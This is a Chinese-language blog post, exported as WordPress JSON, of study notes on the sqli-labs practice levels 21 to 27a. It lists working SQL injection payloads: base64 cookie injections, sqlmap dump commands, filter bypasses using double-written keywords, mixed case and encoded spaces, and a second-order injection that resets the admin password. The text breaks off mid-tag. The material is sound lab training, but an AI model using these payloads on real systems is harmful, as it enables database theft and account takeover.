{"id":144,"date":"2021-11-15T11:13:43","date_gmt":"2021-11-15T03:13:43","guid":{"rendered":"http:\/\/daishen.ltd\/?p=144"},"modified":"2021-11-15T11:13:43","modified_gmt":"2021-11-15T03:13:43","slug":"sqli-labs%e5%ad%a6%e4%b9%a0%e7%ac%94%e8%ae%b0less_21-37","status":"publish","type":"post","link":"https:\/\/www.daishen.ltd\/?p=144","title":{"rendered":"Sqli-labs\u5b66\u4e60\u7b14\u8bb0Less_21-37"},"content":{"rendered":"


\nSqli-labs\u5b66\u4e60\u7b14\u8bb0Less_21-37<\/title><\/p>\n<h1 id=\"less-21\"><strong>Less-21<\/strong><\/h1>\n<p><strong>Cookie Injection- Error Based- complex – string ( \u57fa\u4e8e\u9519\u8bef\u7684\u590d\u6742\u7684\u5b57\u7b26\u578bCookie\u6ce8\u5165)<\/strong><\/p>\n<p> <\/p>\n<p>Cookie \u8fd9\u91cc\u662f\u7ecf\u8fc7 base64 \u52a0\u5bc6\u7684\uff0c\u6240\u4ee5\u6211\u4eec\u53ea\u9700\u8981\u4f20\u5165\u52a0\u5bc6\u540e\u7684 payload \u7ed9 cookie \u7684 uname \u5373\u53ef<\/p>\n<p>\u7206\u4f4d\u7f6epaylaod<\/p>\n<h3 id=\"\u624b\u5de5\u6ce8\u5165\">\u624b\u5de5\u6ce8\u5165<\/h3>\n<p><strong>\u6ce8uname\u7684\u503c\u4e3a\u4e0d\u6b63\u786e\u7684<\/strong><\/p>\n<pre><code>-admin') union select 1,2,3#\n\nCookie: uname=LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMiwzIw==\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>-admin') union select 1,2,database()#\n\n\nCookie: uname=LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw==\n<\/code><\/pre>\n<p>\u66b4\u8868<\/p>\n<pre><code>-admin') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#\n\n \nCookie: uname=LWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT1kYXRhYmFzZSgpIw==\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>-admin') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#\n\n \nLWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIw==\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>-admin') union select 1,2,group_concat(username,0x3a,password) from users#\n\n\nLWFkbWluJykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUsMHgzYSxwYXNzd29yZCkgZnJvbSB1c2VycyM=\n<\/code><\/pre>\n<h3 id=\"sqlmap\u81ea\u52a8\u8dd1\">sqlmap\u81ea\u52a8\u8dd1<\/h3>\n<pre><code>sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-21\/\" --cookie=\"uname=*\" --tamper=\"base64encode\" --dbms=MySQL --random-agent --flush-session --technique=U -v 3\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-21\/\" --cookie=\"uname=*\" --tamper=\"base64encode\" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 --batch --dbs\n<\/code><\/pre>\n<p>\u66b4\u8868<\/p>\n<pre><code>sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-21\/\" --cookie=\"uname=*\" --tamper=\"base64encode\" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 --batch -D security --tables\n<\/code><\/pre>\n<p>\u66b4\u5217\u540d<\/p>\n<pre><code>sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-21\/\" --cookie=\"uname=*\" --tamper=\"base64encode\" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 --batch -D security -T users --columns\n<\/code><\/pre>\n<p>\u66b4\u6570\u636e<\/p>\n<pre><code>sqlmap -u \"https:\/\/daishen.ltd:1112\/Less-21\/\" --cookie=\"uname=*\" --tamper=\"base64encode\" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 --batch -D security -T users -C username,password -dump\n<\/code><\/pre>\n<h1 id=\"less-22\"><strong>Less-22<\/strong><\/h1>\n<p><strong>Cookie Injection- Error Based- Double Quotes – string (\u57fa\u4e8e\u9519\u8bef\u7684\u53cc\u5f15\u53f7\u5b57\u7b26\u578bCookie\u6ce8\u5165)<\/strong><\/p>\n<p> <\/p>\n<p>\u548cless-21\u4e00\u6837\u7684\uff0c\u53ea\u9700\u8981\u4f7f\u7528\u53cc\u5f15\u53f7\u4ee3\u66ff\u5355\u5f15\u53f7<strong>\u518d\u53d6\u6389\u62ec\u53f7*<\/strong>*\uff0c**<\/p>\n<h1 id=\"less-23\"><strong>Less-23<\/strong><\/h1>\n<p><strong>GET – Error based – strip comments (\u57fa\u4e8e\u9519\u8bef\u7684\uff0c\u8fc7\u6ee4\u6ce8\u91ca\u7684GET\u578b)<\/strong><\/p>\n<p> <\/p>\n<p><strong>\u8fc7\u6ee4\u4e86\u6ce8\u91ca\u7b26\u53f7<\/strong>\u6240\u4ee5\u53ea\u80fd\u6784\u9020\u95ed\u5408\u8bed\u53e5<\/p>\n<p>\u786e\u5b9a\u5b57\u6bb5\u6570<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-23\/?id=1' and 1=2 order by 3 and '1' ='1\n<\/code><\/pre>\n<p>\u786e\u5b9a\u5b57\u6bb5\u4f4d\u7f6e<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-23\/?id=1' and 1=2 union select 1,2,3 and '1' ='1\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-23\/?id=-1' union select 1,2,database() '\n<\/code><\/pre>\n<p>\u66b4\u8868<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-23\/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-23\/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and '1'='1\n<\/code><\/pre>\n<p>\u66b4\u5185\u5bb9<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-23\/?id=-1' union select 1,2,group_concat(username,password) from users where 1 and '1'='1\n<\/code><\/pre>\n<h1 id=\"less---24\"><strong>Less – 24<\/strong><\/h1>\n<p><strong>Second Degree Injections *Real treat* -Store Injections (\u4e8c\u6b21\u6ce8\u5165)<\/strong><\/p>\n<p> <\/p>\n<h3 id=\"\u601d\u8def\u5206\u6790\">\u601d\u8def\u5206\u6790<\/h3>\n<p>\u4ece\u4ee3\u7801\u4e0a\u6765\u770b\u8c8c\u4f3c\u90fd\u88ab\u8f6c\u4e49\u4e86\uff0c\u4e4d\u4e00\u770b\u662f\u6210\u529f\u6ce8\u5165\u7684\u3002\u5b9e\u9645\u4e0a\u7684\u786e\u4e0d\u80fd\u4f7f\u7528\u5e38\u89c4\u7684\u601d\u8def\u6765\u8fdb\u884c\u6ce8\u5165\uff0c\u56e0\u4e3a\u8fd9\u9898\u662f\u4e8c\u6b21\u6ce8\u5165\uff0cISCC 2019 \u5f53\u65f6\u4f7f\u7528\u8fd9\u9898\u7684\u8003\u67e5\u70b9\u662f\u4fee\u6539\u6389 admin \u7528\u6237\u7684\u5bc6\u7801\uff0c\u7136\u540e\u518d\u767b\u5f55\u5373\u53ef\u3002\u5047\u8bbe\u4e0d\u77e5\u9053 admin \u7528\u6237\u7684\u60c5\u51b5\u4e0b\uff0c\u60f3\u8981\u4fee\u6539\u6389 admin \u7528\u6237\u7684\u5bc6\u7801\u7684\u8bdd\uff0c\u8fd9\u91cc\u5c31\u4f7f\u7528\u7684\u662f\u4e8c\u6b21\u6ce8\u5165\u7684\u59ff\u52bf\u4e86\u3002<\/p>\n<p><strong>\u4e8c\u6b21\u6ce8\u5165<\/strong> \u7b80\u5355\u6982\u62ec\u5c31\u662f\u9ed1\u5ba2\u7cbe\u5fc3\u6784\u9020 SQL \u8bed\u53e5\u63d2\u5165\u5230\u6570\u636e\u5e93\u4e2d\uff0c\u6570\u636e\u5e93\u62a5\u9519\u7684\u4fe1\u606f\u88ab\u5176\u4ed6\u7c7b\u578b\u7684 SQL \u8bed\u53e5\u8c03\u7528\u7684\u65f6\u5019\u89e6\u53d1\u653b\u51fb\u884c\u4e3a\u3002\u56e0\u4e3a\u7b2c\u4e00\u6b21\u9ed1\u5ba2\u63d2\u5165\u5230\u6570\u636e\u5e93\u7684\u65f6\u5019\u5e76\u6ca1\u6709\u89e6\u53d1\u5371\u5bb3\u6027\uff0c\u800c\u662f\u518d\u5176\u4ed6\u8bed\u53e5\u8c03\u7528\u7684\u65f6\u5019\u624d\u4f1a\u89e6\u53d1\u653b\u51fb\u884c\u4e3a\uff0c\u8fd9\u4e2a\u5c31\u662f\u4e8c\u6b21\u6ce8\u5165\u3002<\/p>\n<p>\u5148\u770b\u521b\u5efa\u7528\u6237\u7684\u5730\u65b9\uff1a<\/p>\n<pre><code class=\"language-sql\" lang=\"sql\">username = mysql_escape_string($_POST['username']) ;\n<\/code><\/pre>\n<p>username \u88ab <code>mysql_escape_string<\/code> \u51fd\u6570\u8fc7\u6ee4\u4e86\uff0c\u8be5\u51fd\u6570\u7684\u4f5c\u7528\u5982\u4e0b\uff1a<\/p>\n<figure>\n<table>\n<thead>\n<tr>\n<th style=\"text-align:left;\">\u5371\u9669\u5b57\u7b26<\/th>\n<th style=\"text-align:left;\">\u8f6c\u4e49\u540e<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align:left;\"><code>\\<\/code><\/td>\n<td style=\"text-align:left;\"><code>\\\\<\/code><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\"><code>'<\/code><\/td>\n<td style=\"text-align:left;\"><code>\\'<\/code><\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\"><code>\"<\/code><\/td>\n<td style=\"text-align:left;\"><code>\\\"<\/code><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p>\u518d\u770b\u4e0b\u66f4\u65b0\u5bc6\u7801\u7684\u6838\u5fc3\u8bed\u53e5\uff1a<\/p>\n<pre><code class=\"language-sql\" lang=\"sql\">UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'\n<\/code><\/pre>\n<p>\u8fd9\u91cc\u76f4\u63a5\u4f7f\u7528\u5355\u5f15\u53f7\u62fc\u63a5\u4e86 username \u6240\u4ee5\u5f53 username \u53ef\u63a7\u7684\u8bdd \uff0c\u8fd9\u91cc\u662f\u5b58\u5728SQL\u6ce8\u5165\u7684\uff0c\u5047\u8bbe\u7528\u6237\u6ce8\u518c\u7684 username \u7684\u503c\u4e3a\uff1a<code>admin'#<\/code>\uff0c\u90a3\u4e48\u6b64\u65f6\u7684\u5b8c\u6574\u8bed\u53e5\u5c31\u4e3a\uff1a<\/p>\n<pre><code class=\"language-sql\" lang=\"sql\">UPDATE users SET PASSWORD='$pass' where username='admin'# and password='$curr_pass'\n<\/code><\/pre>\n<p>\u6b64\u65f6\u5c31\u5b8c\u5168\u6539\u53d8\u4e86\u8bed\u4e49\uff0c\u76f4\u63a5\u5c31\u4fee\u6539\u6389\u4e86 admin \u7528\u6237\u7684\u5bc6\u7801\u3002<\/p>\n<h3 id=\"\u6b65\u9aa4\u6f14\u793a\">\u6b65\u9aa4\u6f14\u793a<\/h3>\n<p>\u5e38\u89c1\u4e00\u4e2a<code>admin'#<\/code>\u5f00\u5934\u7684\u7528\u6237\u540d\uff0c\u4e0b\u9762\u5217\u4e3e\u7684\u51e0\u79cd\u90fd\u53ef\u4ee5\uff0c\u4ee5\u6b64\u7c7b\u63a8\uff0c\u5f88\u7075\u6d3b\uff1a<\/p>\n<pre><code class=\"language-none\" lang=\"none\">admin'#1\nadmin'#233\nadmin'#gg\n...\n<\/code><\/pre>\n<p>\u6ce8\u518c\u5b8c\u6210\u540e\u6570\u636e\u5e93\u7684\u8bb0\u5f55\u4fe1\u606f\u5982\u4e0b\uff1a<\/p>\n<pre><code class=\"language-shell\" lang=\"shell\">mysql> select * from users;\n+----+---------------+------------+\n| id | username | password |\n+----+---------------+------------+\n| 20 | admin'#hacker | 111 |\n+----+---------------+------------+\n<\/code><\/pre>\n<p>\u6210\u529f\u6dfb\u52a0\u4e86\u8bb0\u5f55\uff0c\u8fd9\u91cc\u5355\u5f15\u53f7\u6570\u636e\u5e93\u4e2d\u4e2d\u770b\u6ca1\u6709\u88ab\u867d\u7136\u8f6c\u4e49\u4e86\uff0c\u8fd9\u662f\u56e0\u4e3a\u8f6c\u4e49\u53ea\u4e0d\u8fc7\u662f\u6682\u65f6\u7684\uff0c\u6700\u540e\u5b58\u5165\u5230\u6570\u636e\u5e93\u7684\u65f6\u5019\u8fd8\u662f\u6ca1\u53d8\u7684\u3002<\/p>\n<p>\u63a5\u4e0b\u6765\u767b\u5f55 <code>admin'#hacker<\/code> \u7528\u6237\uff0c\u7136\u540e\u6765\u4fee\u6539\u5f53\u524d\u7684\u5bc6\u7801<\/p>\n<p>\u6b64\u65f6\u6765\u6570\u636e\u5e93\u4e2d\u67e5\u770b\uff0c\u53ef\u4ee5\u53d1\u73b0\u6210\u529f\u4fee\u6539\u6389\u4e86 admin \u7528\u7684\u5bc6\u7801\u4e86\uff1a<\/p>\n<pre><code class=\"language-shell\" lang=\"shell\">mysql> select * from users;\n+----+---------------+------------+\n| id | username | password |\n+----+---------------+------------+\n| 8 | admin | 233 |\n| 20 | admin'#hacker | 111 |\n+----+---------------+------------+\n<\/code><\/pre>\n<h1 id=\"less-25\"><strong>Less-25<\/strong><\/h1>\n<p><strong>Trick with OR & AND (\u8fc7\u6ee4\u4e86or\u548cand)<\/strong><\/p>\n<p> <\/p>\n<h3 id=\"\u53cc\u5199\u5d4c\u5957\u7ed5\u8fc7\">\u53cc\u5199\u5d4c\u5957\u7ed5\u8fc7<\/h3>\n<p>\u66b4\u4f4d\u7f6e<\/p>\n<p>\u6ce8\uff1aid\u7684\u503c\u4e3a\u4e0d\u6b63\u786e\u7684<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-25\/?id=-1' union select 1,2,3 --+\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-25\/?id=-1' union select 1,2,database() --+\n\nhttps:\/\/daishen.ltd:1112\/Less-25\/?id=1' aandnd 1=2 union select 1,2,database() --+\n<\/code><\/pre>\n<p>\u7206\u8868<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-25\/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>\u8fc7\u6ee4\u4e86or\uff0c\u5728\u52a0\u4e00\u5c42or\uff0c\u6240\u4ee5\u53cc\u5199or\u7ed5\u8fc7<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-25\/?id=-1' union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-25\/?id=-1' union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users' --+\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<p>\u540c\u6837password\u7684or\u4e5f\u4f1a\u8fc7\u6ee4\u6210passwd<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-25\/?id=-1' union select 1,2,group_concat(username,0x3a,passwoorrd) from users --+\n<\/code><\/pre>\n<h3 id=\"\u7b26\u53f7\u66ff\u6362\">\u7b26\u53f7\u66ff\u6362<\/h3>\n<pre><code class=\"language-none\" lang=\"none\">or` -> `||\nand` -> `&&\n<\/code><\/pre>\n<p> <\/p>\n<pre><code class=\"language-none\" lang=\"none\">?id=1'||extractvalue(1,concat(0x7e,database()))--+\n<\/code><\/pre>\n<h1 id=\"less-25a\"><strong>Less-25a <\/strong><\/h1>\n<p><strong>Trick with OR & AND Blind \uff08\u8fc7\u6ee4\u4e86or\u548cand\u7684\u76f2\u6ce8\uff09<\/strong><\/p>\n<p> <\/p>\n<h3 id=\"\u8054\u5408\u6ce8\u5165-1\">\u8054\u5408\u6ce8\u5165<\/h3>\n<p>\u66b4\u5e93<\/p>\n<pre><code>?id=1 aandnd 1=2 union select 1,2,database() --+\n<\/code><\/pre>\n<p>\u66b4\u8868\u53cc\u5199or<\/p>\n<pre><code>?id=1 aandnd 1=2 union select 1,2,group_concat(table_name) from infoorrmation_schema.tables where table_schema=database() --+\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>?id=1 aandnd 1=2 union select 1,2,group_concat(column_name) from infoorrmation_schema.columns where table_name='users' --+\n<\/code><\/pre>\n<p>\u66b4\u5185\u5bb9<\/p>\n<pre><code>?id=1 aandnd 1=2 union select 1,2,group_concat(username,passwoorrd) from users where 1--+\n<\/code><\/pre>\n<h1 id=\"less-26\"><strong>Less 26 <\/strong><\/h1>\n<p><strong>Trick with comments and space (\u8fc7\u6ee4\u4e86\u6ce8\u91ca\u548c\u7a7a\u683c\u7684\u6ce8\u5165)<\/strong><\/p>\n<p> <\/p>\n<p>\u8fc7\u6ee4\u4e86 or \u548c and \u53ef\u4ee5\u91c7\u7528 \u53cc\u5199\u6216\u8005 && || \u7ed5\u8fc7<\/p>\n<p>\u8fc7\u6ee4\u6ce8\u91ca \u53ef\u4ee5\u4f7f\u7528\u95ed\u5408\u7ed5\u8fc7<\/p>\n<p>\u8fc7\u6ee4\u4e86\u7a7a\u683c \u53ef\u4ee5\u4f7f\u7528\u5982\u4e0b\u7684\u7b26\u53f7\u6765\u66ff\u4ee3\uff1a<\/p>\n<figure>\n<table>\n<thead>\n<tr>\n<th style=\"text-align:left;\">\u7b26\u53f7<\/th>\n<th style=\"text-align:left;\">\u8bf4\u660e<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"text-align:left;\">%09<\/td>\n<td style=\"text-align:left;\">TAB \u952e(\u6c34\u5e73)<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\">%0a<\/td>\n<td style=\"text-align:left;\">\u65b0\u5efa\u4e00\u884c<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\">%0c<\/td>\n<td style=\"text-align:left;\">\u65b0\u7684\u4e00\u9875<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\">%0d<\/td>\n<td style=\"text-align:left;\">return \u529f\u80fd<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\">%0b<\/td>\n<td style=\"text-align:left;\">TAB \u952e(\u5782\u76f4)<\/td>\n<\/tr>\n<tr>\n<td style=\"text-align:left;\">%a0<\/td>\n<td style=\"text-align:left;\">\u7a7a\u683c<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<p>\u66b4\u4f4d\u7f6e<\/p>\n<p>||\u662f\u6216\u8005\u7684\u610f\u601d\uff0c’1\u5219\u662f\u4e3a\u4e86\u95ed\u5408\u540e\u9762\u7684 ‘\uff0c\u6ce8\u610f\u5728hackbar\u4e2d\u8f93\u5165&&\u65f6\uff0c\u9700\u8981\u81ea\u884cURL\u7f16\u7801\u4e3a%26%26\uff0c\u5426\u5219\u4f1a\u62a5\u9519\uff0c\u800c\u8f93\u5165||\u4e0d\u9700\u8981\uff0c<\/p>\n<p><strong>\u6ce8\uff1aid\u7684\u503c\u4e3a0\uff0c*<\/strong>*\u2019<strong><\/strong>\u5355\u5f15\u53f7\u9700\u8981url\u8f6c\u7801\u6210%27\uff0c\u7a7a\u683c\u8f6c\u7801\u4e3a%a0**<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26\/?id=0' union select 1,2,3 ||'1\n\nhttps:\/\/daishen.ltd:1112\/Less-26\/?id=0%27%a0union%a0select%a01,2,3%a0||%271\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26\/?id=0' union select 1,database(),3 ||'1\n\nhttps:\/\/daishen.ltd:1112\/Less-26\/?id=0%27%a0union%a0select%a01,database(),3%a0||%271\n<\/code><\/pre>\n<p>\u7206\u8868<\/p>\n<p><strong>\u9700\u8981\u7528&&\u8fde\u63a5\u95ed\u5408\uff0c &&’1’=’1 \uff0c&&\u7528url\u8f6c\u7801\u540e%26%26\uff0c<\/strong><\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26\/?id=0' union select 1,group_concat(table_name) ,3 from information_schema.tables where table_schema=database() &&'1'='1\n\nhttps:\/\/daishen.ltd:1112\/Less-26\/?id=0%27%a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema=database()%a0%26%26%a0%271%27=%271\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<p><strong>or\u8fc7\u6ee4\u7ed5\u8fc7<\/strong><\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26\/?id=0' union select 1,group_concat(column_name) ,3 from infoorrmation_schema.columns where table_name='users' &&'1'='1\n\nhttps:\/\/daishen.ltd:1112\/Less-26\/?id=0%27%a0union%a0select%a01,group_concat(column_name)%a0,3%a0from%a0infoorrmation_schema.columns%a0where%a0table_name=%27users%27%a0%26%26%271%27=%271\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26\/?id=0' union select 1,group_concat(username,0x3a,passwoorrd),3 from users where 1=1 &&'1'='1\n\nhttps:\/\/daishen.ltd:1112\/Less-26\/?id=0%27%a0union%a0select%a01,group_concat(username,0x3a,passwoorrd),3%a0from%a0users%a0where%a01=1%a0%26%26%271%27=%271\n\u6216\u8005\nhttps:\/\/daishen.ltd:1112\/Less-26\/?id=0' union select 1,group_concat(username,0x3a,passwoorrd),3 from users where '1'='1\n\nhttps:\/\/daishen.ltd:1112\/Less-26\/?id=0%27%a0union%a0select%a01,group_concat(username,0x3a,passwoorrd),3%a0from%a0users%a0where%a0%271%27=%271\n<\/code><\/pre>\n<p>\u540e\u9762\u591a\u4e86where ‘1’=’1,\u662f\u4e3a\u4e86\u8ba9\u8bed\u53e5\u53d8\u6210\u65e0\u7ea6\u675f\u67e5\u8be2<\/p>\n<h1 id=\"less-26a\"><strong>Less 26a <\/strong><\/h1>\n<p><strong>GET – Blind Based – All your SPACES and COMMENTS belong to us(\u8fc7\u6ee4\u4e86\u7a7a\u683c\u548c\u6ce8\u91ca\u7684\u76f2\u6ce8)<\/strong><\/p>\n<p> <\/p>\n<p>\u66b4\u4f4d\u7f6e<\/p>\n<p><strong>\u6ce8\uff1aId\u7684\u503c\u4e3a\u4e0d\u6b63\u786e\u7684<\/strong><\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26a\/?id=0') union select 1,2,3 anandd ('1')=('1\n\nhttps:\/\/daishen.ltd:1112\/Less-26a\/?id=0') %a0union%a0select%a01,2,3%a0anandd%a0('1')=('1\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26a\/?id=0') %a0union%a0select%a01,database(),3%a0anandd%a0('1')=('1\n<\/code><\/pre>\n<p>\u66b4\u8868<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26a\/?id=0') %a0union%a0select%a01,group_concat(table_name),3%a0from%a0infoorrmation_schema.tables%a0where%a0table_schema%a0=database()%a0anandd%a0('1')=('1\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26a\/?id=0') %a0union%a0select%a01,group_concat(column_name),3%a0from%a0infoorrmation_schema.columns%a0where%a0table_name%a0='users'%a0anandd%a0('1')=('1\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-26a\/?id=0') %a0union%a0select%a01,group_concat(username,passwoorrd),3%a0from%a0users%a0where%a0('1')=('1\n<\/code><\/pre>\n<h1 id=\"less-27\"><strong>Less 27<\/strong><\/h1>\n<p><strong>GET – Error Based- All your UNION & SELECT belong to us \uff08\u8fc7\u6ee4\u4e86union\u548cselect\u7684<\/strong><\/p>\n<p> <\/p>\n<p>union \u548c select \u6ca1\u6709\u5ffd\u7565\u5927\u5c0f\u5199 \u5bfc\u81f4\u5199\u4e86\u5f88\u591a\u5197\u6742\u7684\u89c4\u5219\uff0c\u4f46\u8fd8\u662f\u53ef\u4ee5\u8f7b\u6613\u7ed5\u8fc7\u3002<\/p>\n<pre><code class=\"language-shell\" lang=\"shell\"># \u5927\u5c0f\u5199\u6df7\u5199\nunioN\nunIon\nseLect\n...\n\n# \u5d4c\u5957\u53cc\u5199\nuunionnion\nsselectelect\nununionion\n...\n<\/code><\/pre>\n<p>\u4f7f\u7528\u5927\u5c0f\u5199\u6765\u7ed5\u8fc7<\/p>\n<p>\u66b4\u4f4d\u7f6e<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27\/?id=0' uniOn selEct 1,2,3 && '1'='1\n\nhttps:\/\/daishen.ltd:1112\/Less-27\/?id=0'%a0uniOn%a0sElect%a01,2,3%a0%26%26%a0'1'='1\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27\/?id=0' uniOn selEct 1,database(),3 && '1'='1\n\nhttps:\/\/daishen.ltd:1112\/Less-27\/?id=0'%a0uniOn%a0selEct%a01,database(),3%a0%26%26%a0'1'='1\n<\/code><\/pre>\n<p>\u7206\u8868<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27\/?id=0' uniOn selEct 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() && '1'='1\n\nhttps:\/\/daishen.ltd:1112\/Less-27\/?id=0'%a0uniOn%a0selEct%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0%26%26%a0'1'='1\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27\/?id=0' uniOn selEct 1,group_concat(column_name),3 from information_schema.columns where table_name='users' && '1'='1\n\nhttps:\/\/daishen.ltd:1112\/Less-27\/?id=0'%a0uniOn%a0selEct%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0%26%26%a0'1'='1\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27\/?id=0' uniOn selEct 1,group_concat(username,0x3a,password),3 from users where '1'='1\n\nhttps:\/\/daishen.ltd:1112\/Less-27\/?id=0'%a0uniOn%a0selEct%a01,group_concat(username,0x3a,password),3%a0from%a0users%a0where%a0'1'='1\n<\/code><\/pre>\n<h1 id=\"less-27a\">Less 27a<\/h1>\n<p><strong>GET – Blind Based- All your UNION & SELECT belong to us<\/strong>\uff08\u8fc7\u6ee4\u4e86union\u548cselect \u76f2\u6ce8\u7248\u672c** <strong>\uff09<\/strong><\/p>\n<p>\u66b4\u4f4d\u7f6e<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27a\/?id=0\" uniOn sElect 1,2,3 && \"1\"=\"1\n\nhttps:\/\/daishen.ltd:1112\/Less-27a\/?id=0\"%a0uniOn%a0sElect%a01,2,3%a0%26%26%a0\"1\"=\"1\n<\/code><\/pre>\n<p>\u66b4\u5e93<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27a\/?id=0\" uniOn sElect 1,database(),3 && \"1\"=\"1\n\nhttps:\/\/daishen.ltd:1112\/Less-27a\/?id=0\"%a0uniOn%a0sElect%a01,database(),3%a0%26%26%a0\"1\"=\"1\n<\/code><\/pre>\n<p>\u7206\u8868<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27a\/?id=0\" uniOn sElect 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() && \"1\"=\"1\n\nhttps:\/\/daishen.ltd:1112\/Less-27a\/?id=0\"%a0uniOn%a0sElect%a01,group_concat(table_name),3%a0from%a0information_schema.tables%a0where%a0table_schema=database()%a0%26%26%a0\"1\"=\"1\n<\/code><\/pre>\n<p>\u66b4\u5b57\u6bb5<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27a\/?id=0\" uniOn sElect 1,group_concat(column_name),3 from information_schema.columns where table_name=\u2019users\u2019 && \"1\"=\"1\n\nhttps:\/\/daishen.ltd:1112\/Less-27a\/?id=0\"%a0uniOn%a0sElect%a01,group_concat(column_name),3%a0from%a0information_schema.columns%a0where%a0table_name='users'%a0%26%26%a0\"1\"=\"1\n<\/code><\/pre>\n<p>\u66b4\u503c<\/p>\n<pre><code>https:\/\/daishen.ltd:1112\/Less-27a\/?id=0\" uniOn sElect 1,group_concat(username,0x3a,password),3 from users where \"1\"=\"1\n\nhttps:\/\/daishen.ltd:1112\/Less-27a\/?id=0\"%a0uniOn%a0sElect%a01,group_concat(username,0x3a,password),3%a0from%a0users%a0where%a0\"1\"=\"1\n<\/code><\/pre>\n<h1 